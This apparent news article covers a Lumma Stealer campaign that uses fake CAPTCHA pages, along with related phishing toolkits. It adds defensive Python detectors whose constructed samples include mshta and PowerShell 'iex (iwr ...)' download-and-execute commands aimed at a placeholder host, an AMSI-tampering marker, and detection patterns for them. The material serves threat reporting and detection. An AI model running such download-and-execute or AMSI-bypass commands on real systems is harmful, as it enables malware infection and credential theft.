Monday, February 3, 2025

Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks


Cybersecurity researchers are calling attention to a new malware campaign that leverages fake CAPTCHA verification checks to deliver the notorious Lumma information stealer.

“The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world,” Leandro Fróes, senior threat research engineer at Netskope Threat Labs, said in a report shared with The Hacker News.

“The campaign also spans multiple industries, including healthcare, banking, and marketing, with the telecom industry having the highest number of organizations targeted.”

The attack chain begins when a victim visits a compromised website, which redirects them to a bogus CAPTCHA page. Instead of a real challenge, the page instructs the visitor to copy a command and paste it into the Windows Run prompt; that command uses the native mshta.exe binary to download and execute an HTA file from a remote server.

It is worth noting that a previous iteration of this technique, widely known as ClickFix, involved the execution of a Base64-encoded PowerShell script to trigger the Lumma Stealer infection.

The HTA file, in turn, executes a PowerShell command to launch the next-stage payload: a PowerShell script that unpacks a second PowerShell script responsible for decoding and loading the Lumma payload, but not before taking steps to bypass the Windows Antimalware Scan Interface (AMSI) in an effort to evade detection.

“By downloading and executing malware in such ways, the attacker avoids browser-based defenses since the victim will perform all of the necessary steps outside of the browser context,” Fróes explained.
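
Because the lure moves the whole chain out of the browser, the place to catch it is host telemetry: process creation events showing mshta.exe launched from the shell with a URL argument, followed by PowerShell spawned by mshta.exe with an encoded command. The following detection sketch is an added example written for this article, not code from Netskope's report; the log lines, the simplified "key=value;" event format (modelled on the fields of a Sysmon process-creation record), the domain example.invalid, and the stage-2 script contents are all constructed, and the assumption that a Run-dialog launch appears with explorer.exe as the parent is an assumption, not something the report states.

```python
import base64
import re
from typing import Optional

# Constructed stand-in for a stage-2 script: it touches AMSI internals by name and
# pulls a further script over HTTPS (both are generic markers, not this campaign's code).
SAMPLE_STAGE2 = (
    "$t=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');"
    "iex (iwr https://example.invalid/stage2.ps1)"
)


def encode_powershell(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> Optional[str]:
    """Reverse of encode_powershell; returns None for anything that is not valid UTF-16LE Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample events (not real telemetry), one per line, in a simplified form.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\mshta.exe; ParentImage=C:\\Windows\\explorer.exe; "
    "CommandLine=mshta https://example.invalid/captcha/verify.hta",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe; "
    "ParentImage=C:\\Windows\\System32\\mshta.exe; "
    "CommandLine=powershell -w hidden -ep bypass -enc " + encode_powershell(SAMPLE_STAGE2),
    "Image=C:\\Windows\\System32\\mshta.exe; ParentImage=C:\\Windows\\explorer.exe; "
    "CommandLine=mshta C:\\Users\\alice\\Downloads\\setup.hta",
    "Image=C:\\Windows\\System32\\notepad.exe; ParentImage=C:\\Windows\\explorer.exe; "
    "CommandLine=notepad.exe report.txt",
]

FIELD_RE = re.compile(r"(\w+)=(.*?)(?=; \w+=|$)")
# -e, -ec, -en, -enc and -encodedcommand are all accepted by powershell.exe.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)


def parse_event(line: str) -> dict:
    """Split a 'key=value; key=value' line into a dict; values may contain spaces."""
    return {k: v for k, v in FIELD_RE.findall(line)}


def analyze_event(line: str) -> dict:
    """Return the findings for one process-creation event plus any decoded command."""
    ev = parse_event(line)
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    findings = []
    decoded = None

    if image.endswith("\\mshta.exe"):
        if URL_RE.search(cmd):
            findings.append("mshta-remote-hta")      # HTA fetched straight from a web server
        if parent.endswith("\\explorer.exe"):
            findings.append("mshta-from-shell")      # assumption: Run-dialog launch shows explorer.exe as parent

    if image.endswith("\\powershell.exe") or image.endswith("\\pwsh.exe"):
        if parent.endswith("\\mshta.exe"):
            findings.append("powershell-child-of-mshta")
        m = ENC_RE.search(cmd)
        if m:
            findings.append("powershell-encoded")
            decoded = decode_powershell(m.group(1))
            if decoded and re.search(r"amsi", decoded, re.I):
                findings.append("amsi-tamper")       # generic marker for AMSI tampering, not a specific bypass
            if decoded and re.search(r"\biex\b|invoke-expression|downloadstring|\biwr\b", decoded, re.I):
                findings.append("download-and-execute")
    return {"image": image, "findings": findings, "decoded": decoded}


def analyze(lines):
    return [analyze_event(line) for line in lines]


if __name__ == "__main__":
    for r in analyze(SAMPLE_EVENTS):
        if r["findings"]:
            print(r["image"], r["findings"], (r["decoded"] or "")[:60])
```

The decoded command is kept in the result on purpose: the encoded form defeats simple string matching on the command line, so any rule for this chain has to decode before it inspects. A local-path mshta launch from the shell (third event) is only a weak signal on its own; the combination of a remote URL and a PowerShell child with an encoded command is what makes the first two events worth an alert.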


“The Lumma Stealer operates using the malware-as-a-service (MaaS) model and has been extremely active in the past months. By using different delivery methods and payloads it makes detection and blocking of such threats more complex, especially when abusing user interactions within the system.”

Fake CAPTCHA Campaign

As recently as this month, Lumma has also been distributed via roughly 1,000 counterfeit domains impersonating Reddit and WeTransfer that redirect users to download password-protected archives.

These archive files contain an AutoIT dropper dubbed SelfAU3 Dropper that subsequently executes the stealer, according to Sekoia researcher crep1x. In early 2023, threat actors leveraged a similar technique to spin up over 1,300 domains masquerading as AnyDesk in order to push the Vidar Stealer malware.

The development comes as Barracuda Networks detailed an updated version of the Phishing-as-a-Service (PhaaS) toolkit known as Tycoon 2FA that includes advanced features to “obstruct, derail, and otherwise thwart attempts by security tools to confirm its malicious intent and inspect its web pages.”

These include the use of legitimate (possibly compromised) email accounts to send the phishing emails, and a series of steps to frustrate analysis: detecting automated security scripts, listening for keystrokes that suggest web inspection (such as opening developer tools), and disabling the right-click context menu.
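
Those three behaviours leave fingerprints in the page source, which is useful when triaging a captured phishing page. The scanner below is an added example written for this article, not Barracuda's analysis code and not Tycoon 2FA's own code; the sample page is constructed to contain the kinds of handlers the article describes (a contextmenu handler calling preventDefault, a keydown handler watching for F12 or Ctrl+Shift+I, a navigator.webdriver check), and those are assumed implementations of the described behaviours, not the kit's actual markup.

```python
import re

# Constructed sample page, not a real Tycoon 2FA artefact.
SAMPLE_PAGE = """<html><body>
<script>
document.addEventListener('contextmenu', function(e){ e.preventDefault(); });
document.onkeydown = function(e){
  if (e.keyCode == 123 || (e.ctrlKey && e.shiftKey && e.keyCode == 73)) { return false; }
};
if (navigator.webdriver) { window.location = 'about:blank'; }
</script>
<form action="/login"><input name="user"><input name="pass" type="password"></form>
</body></html>"""

# Constructed benign page: it also has a keydown handler (submit on Enter), which must not fire a finding.
BENIGN_PAGE = """<html><body>
<script>document.onkeydown = function(e){ if (e.keyCode == 13) { document.forms[0].submit(); } };</script>
<form action="/login"><input name="user"><input name="pass" type="password"></form>
</body></html>"""

# Each indicator is a loose pattern for one of the anti-analysis behaviours; tune to taste.
INDICATORS = {
    "context-menu-disabled": re.compile(
        r"contextmenu[\s\S]{0,120}?preventDefault|oncontextmenu\s*=\s*['\"]?\s*return\s+false", re.I),
    "devtools-keystroke-watch": re.compile(
        r"(?:on)?keydown[\s\S]{0,200}?(?:keyCode\s*===?\s*123|\bF12\b|key\s*===?\s*['\"]I['\"])", re.I),
    "automation-check": re.compile(r"navigator\.webdriver|phantom|headless", re.I),
}


def scan_page(html: str) -> list:
    """Return the sorted names of anti-analysis indicators present in the page source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(html))


if __name__ == "__main__":
    print(scan_page(SAMPLE_PAGE))   # three indicators
    print(scan_page(BENIGN_PAGE))   # none
```

These are triage indicators, not proof: plenty of legitimate sites disable right-click or branch on navigator.webdriver, so treat a hit as a reason to look closer (especially on a page that also carries a credential form), not as a verdict.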

Social engineering-oriented credential harvesting attacks have also been observed leveraging avatar provider Gravatar to mimic various legitimate services like AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.

“By exploiting Gravatar’s ‘Profiles as a Service,’ attackers create convincing fake profiles that mimic legitimate services, tricking users into divulging their credentials,” SlashNext Field CTO Stephen Kowski said.


“Instead of generic phishing attempts, attackers tailor their fake profiles to closely resemble the legitimate services they’re mimicking, through services that aren’t often known or protected.”
